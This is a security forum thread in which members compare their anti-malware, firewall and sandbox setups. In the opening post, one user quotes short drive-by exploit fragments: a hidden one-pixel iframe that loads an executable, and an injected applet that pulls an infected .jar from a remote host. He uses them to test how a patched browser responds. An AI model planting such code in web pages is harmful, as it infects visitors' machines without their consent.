What is your security setup these days?

Discussion in 'other anti-malware software' started by dja2k, Dec 15, 2005.

  1. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I've not found this to be so. Every IE exploit I've tested where it's patched brings up a prompt download box.

    Just now I ran an iframe test. Opening to the page triggers a remote code install attempt:

    Code:
    <iframe src="exp.exe" width=1 height=1></iframe>
    
    ie_iframe.gif
    __________________________________________________

    From old on-line tests:

    Remote install of an infected .jar file:

    Code:
    Trojan_Path=Trojan_Path+"MS03-11";
          ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar" 
    codebase="'+InetPath+'"
    
    expl-1_jar.gif
    _____________________________________________________________-

    Remote install of .dll

    Code:
    hrResponseHdr: 0, URL: (http://activex.microsoft.com/objects/ocget.dll)
    
    (this is used to help the exploit to bypass pop-up blockers)

    _________________________________________________________________________


    Remote install of an infected plugin

    ieplugin.gif
    __________________________________________________________________

    For the Zero-day occurrence, Easter's suggestion for HIPS will take care of it.


    ----
    rich
     
  2. Kees1958

    Kees1958 Registered Member

    Joined:
    Jul 8, 2006
    Posts:
    5,857
    After trying a few setups for the home XP box (shared use PC), I settled for a pop-up quiet and an inbound prevention based approach.

    Being a former IT specialist (that was 18 years ago, systems design, data base administration and mainframe/green screen communication specialist), I have a great trust in policy and rights management.

    Since XP Home versions come without policy management, and this policy management is way too difficult for the average PC user, I have bought DefenseWall (and before that GeSWall to try out).

    I now have on XP sp3 box:

    First level of Defense

    The network stack is the first contact with the external world, therefore you need a firewall. When you are not a firewall specialist (firewalls like Comodo's D+ are loaded with classical HIPS functionality), the default XP firewall will do for daily home PC issues. We are behind a hardware FW (NAT/SPI) and XP's FW.

    Second level of defense
    This is the process stack. DefenseWall mitigates all internet-facing apps in a very powerful limited user environment; it also chains downloaded files, paralysing most malware. I have used the resource protection option to get additional protection (see https://www.wilderssecurity.com/showpost.php?p=1248922&postcount=21).

    Third level of defense
    Realtime check on known malware on INCOMING data streams only! Preventing it from entering the PC is why I use this (not for post-infection situations).
    I re-installed Avast and only use the Network shield (filters on worms and backdoors), Internet-mail (Outlook Express), P2P (LimeWire). The Messenger shield, Outlook shield and the standard shield (for real-time protection of data/executables on your PC) are not installed. ThreatFire will replace the protection offered by the standard shield; Messenger and Outlook are not used on this PC.

    Fourth level of Defense
    Install ThreatFire, add the extra rule for outbound protection. When executable code and data arrive on your harddisk, TF will guard them, not by scanning all actions or trying to control all attack vectors (like D+ of Comodo). Instead it monitors sensitive areas of your PC and looks for bad behavior. When an intrusion triggers ThreatFire, it will track all actions of the intruder. When the intruder has collected enough bad behavior points, TF will trigger a pop-up AFTER checking its Anti Virus blacklist database first. So when TF warns you, you know that it is not a known malware. So it can be a false positive or a zero day threat. TF has a reputation of throwing close to zero false positives at you. Besides that you can always Google for the program causing the warning (just click "learn more on this threat"). Consider TF your gate keeper/goal keeper protecting your system on process and data level, with a blacklist and behavior blocking HIPS.

    Regards Kees

    Note it is the combo which provides a good solution. You can use other freeware, like Comodo/OA, which are both FWs that provide more leaktest protection (DW and TF will prevent or arrest all intruders); Avira is a better freeware AV than Avast (but lacks the extra options of Avast to pre-check inbound data flows). For less than 20 bucks annually this setup is a bargain.

    Opera is the browser of choice on this old CPU, because it is really fast compared to IE7 and Firefox. We have Opera skinned as if it were IE7 (so other users only said, geh, it is faster), so they did not notice the change :)
     
    Last edited: May 25, 2008
  3. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    LOL :D :D
     
  4. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    Update:

    Uninstalled ThreatFire because of:

    While I wait for EQS 4.0 to become final, I'm installing OA free, which seems easy to use, and from what I've read, is very effective. I like the "run safer" feature.

    Is there a way to make Firefox always run with limited rights? It already starts sandboxed, I would like to have it sandboxed and limited.


    PS: The other 2 options I'm considering are:
    1.- try DriveSentry
    2.- Rely only on SBIE and Returnil
     
    Last edited: May 25, 2008
  5. MikeNAS

    MikeNAS Registered Member

    Joined:
    Sep 28, 2006
    Posts:
    697
    Location:
    FiNLAND
    You can do that with Online Armor, DefenseWall, DropMyRights etc. Of course you use that OA because you already have it installed :D
     
  6. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,784
    Active
    Look'n'Stop
    DefenseWall
    AntiBot


    On Demand
    DrWeb CureIt
    Malwarebytes AntiMalware


    Opera
     
  7. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,944
    Location:
    USA
    ACTIVE

    ZoneAlarm Pro
    GeSWall
    ThreatFire
    avast!

    ON-DEMAND

    MalwareBytes Anti-Malware
    Dr.WEB
    GMER
    RootkitRevealer
    AVZ

    BACK UP/RECOVERY

    Acronis True Image
     
  8. GES/POR

    GES/POR Registered Member

    Joined:
    Nov 26, 2006
    Posts:
    1,490
    Location:
    Armacham
    Right now but change rather quickly for the fun of it

    OA,DS,DrW n MBAM
     
  9. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    Another update in less than 24 hours!

    I decided to trial other apps before settling down on one.

    Replaced OA free (which I liked a lot, and might come back later), with AE.
    Finally I made up my mind and decided to try this. So far, I'm loving it. I feel more secure than ever with this thing on board.

    I do feel that it can bring to frustration with time, since it's VERY tight! We'll see, I have 30 days left :D

    Next on the trial list will be DriveSentry (unless I decide AE is the final solution).
     
  10. jdd58

    jdd58 Registered Member

    Joined:
    Jan 30, 2008
    Posts:
    556
    Location:
    Sonoran Desert
    I used to use proxomitron, can't remember why I stopped. Certainly I will try it again if you post your ruleset.
     
  11. normishmael

    normishmael Guest

    Avira AntiVir
    A-squared 2 free
    Malwarebytes Anti-Malware
    A-squared HiJackFree
    Firefox browser
    Kerio Personal Firewall
    Fully updated XP Service Pack 3
     
  12. nomarjr3

    nomarjr3 Registered Member

    Joined:
    Jul 31, 2007
    Posts:
    502
    New setup on 'dummy' PC:

    On-Access:
    DriveSentry
    ZoneAlarm FW (this seems to be a system-hogger :thumbd: )
    BOClean
    SnoopFree
    Winpatrol


    On-Demand:
    Advanced WindowsCare Personal
    SAS Free


    Browsers:
    Opera w/ Sandboxie
    Flock 1.2b


    Utilities:
    Auslogics BoostSpeed
    CCleaner
    Recuva
     
  13. ErikAlbert

    ErikAlbert Registered Member

    Joined:
    Jun 16, 2005
    Posts:
    9,455
    Yes, I tried it too, my system was much slower, ditched it the same day.
     
  14. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,639
    added
    changed
    removed


    XP setup 1 + 2

    Vista setup 1 + 2

    Resident:

    Windows Firewall

    Other Security / System Hardening:

    vLite'd Windows Vista SP1 (with service tweaking)
    xp-AntiSpy
    Process Explorer
    Firefox extensions: AdBlock Plus, and Permit Cookies
     
  15. boonie

    boonie Registered Member

    Joined:
    Aug 5, 2007
    Posts:
    238
    WSFuser,
    So, I assume no problems since going naked?
    Do you check periodically with any scanners or no?
    Just curious.
     
  16. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,639
    No problems.

    I havent done any scans yet but I will later.
     
  17. jmonge

    jmonge Registered Member

    Joined:
    Mar 20, 2008
    Posts:
    13,744
    Location:
    Canada
    1) Windows XP SP3 firewall/updated
    2) D.E.P. on all programs
    3) Sandboxie paid / part-time during the day time for me :eek:
    4) DefenseWall HIPS / part-time during the evening for wife ;)
    5) AppRanger (deny persistent changes to system, white/black lists) (lock down system) during the day part-time only, for me :eek:
    6) SpywareBlaster paid
     
    Last edited: May 27, 2008
  18. rolarocka

    rolarocka Guest

    ACTIVE (behind router)

    Nod32 2.7
    ThreatFire
    SandboxIE with Opera 9.5

    ON-DEMAND

    MalwareBytes Anti-Malware
    WinPatrol
    SUPERAntiSpyware Free

    BACK UP/RECOVERY

    DriveImage XML
     
  19. Trendstone71

    Trendstone71 Registered Member

    Joined:
    May 30, 2008
    Posts:
    7
    EAZ-FIX 8.1 Pro
    Avira AntiVir 8.0 Premium
    Evidence Eliminator 6.0

    I practice the Boot-to-Restore concept:

    -While I'm Online, Avira's Web scanner and Guard
    ensure my protection.

    -When I disconnect my dial-up ADSL,
    I roll back my system to a malware-free snapshot created
    on the day I formatted my PC.

    -For my e-mail, I use Gmail.

    > No more Firewalls and Sandboxes that slowed down my Internet Browsing speed!
    > No more crazy/silly HIPS that alarmed me on the most obvious processes!
     
  20. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,784
    New setup in sig. :D
     
  21. HURST

    HURST Registered Member

    Joined:
    Jul 20, 2007
    Posts:
    1,419
    gaining weight? LOL
     
  22. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    I'm still short in an area I would love to cover with a behavioral blocker but TF is way too much for my needs, so I'm patiently waiting for some other to surface if ever. Maybe DriveSentry? Or if I get my hands on an old old version of CyberHawk again. LoL

    In the meantime EQS 4.0 (beta) is still holding its own very well with Alcyon's RuleSets and some additional custom tweaking of my own.

    I got dizzy with Comodo D+ so the trade-off back to my mainstream Kerio 2.15 with BZ Kerio 2x Default Replacement - Advanced - Final.conf rules combined with EQS 4.0 (beta) has not only beefed up confidence/protection again, but scaled down the noise and WEIGHT!

    SandboxIE is always in attendance.

    I'm working more now toward a more modular & trimmer, but aggressively defensive setup with "Lite" apps as opposed to the heavier types when available.

    Experimenting with xp-AntiSpy, Samurai, and Ozone and other set-in-place/hardening apps and forget it, then top them all off with LUA proggy like SuRun.

    Still looks like Faronic's AE is going to keep being an integral part of my best protection additions also.

    I'm making like there are no such things as any Virtual Systems, ISR's, like DF, FD-ISR, Returnil for awhile.
     
  23. hammerman

    hammerman Registered Member

    Joined:
    Jul 14, 2007
    Posts:
    283
    Location:
    UK
    Hi Easter,

    I tried AE for a while and, although I like the approach it takes, I found that EQS is probably sufficient for me.

    If a new executable tries to run, EQS tells me. I may even put an automatic block on all unknown executables from running now that I have confidence in my application rules. I already have an automatic block on creation and modification of all new executables.

    I gave up on my behavioural blocker Mamutu. I couldn't get on with the 'behaves-like' messages. I kept getting behaves-like this and behaves-like that with no explanation as to WHY. I prefer the pure logic of EQS.
     
  24. adyextreme

    adyextreme Registered Member

    Joined:
    Jun 2, 2008
    Posts:
    6
    Location:
    Bucarest/Romania
    Hi, for best security I use a Windows Vista live DVD, custom made, x64 version;
    that means it's read only. True, I have a very powerful system, Itanium based:
    4x 4 core = 16 cores = 40GHz, 128MB x4 cache, 132GB RAM, around 10x 500MB
    SCSI HDD encrypted with a 10MB custom encryption key :thumb:
     
  25. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    I completely agree. EQS is quite sufficient AS-IS, and you can tailor exactly the right RULES needed for each situation as you see fit.

    AE added to EQS is going to extremes for most users and I only really need it for local research and testing purposes mostly.

    And how about that EQS? "Lite", but deceptively energetic & responsive plus equally aggressive in defense.
     